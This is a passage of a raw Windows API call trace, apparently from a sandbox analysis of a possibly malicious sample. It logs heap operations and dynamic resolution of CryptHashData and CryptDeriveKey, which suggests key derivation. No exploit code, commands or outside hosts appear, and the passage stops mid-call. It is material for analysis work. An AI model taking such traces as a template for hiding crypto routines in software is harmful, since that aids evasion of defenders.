RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0267.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f88 [0267.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0267.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0267.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.229] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0267.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0267.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0267.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.232] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0267.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51d48 [0267.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51d48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0267.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.234] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0267.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0267.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.234] CryptHashData (hHash=0xa87710, pbData=0x2e55048, dwDataLen=0x3, dwFlags=0x1) returned 1 [0267.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0267.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0267.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0267.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.236] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.237] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.237] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.237] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0267.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51e68 [0267.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51e68, cbMultiByte=15, lpDefaultChar=0x0, 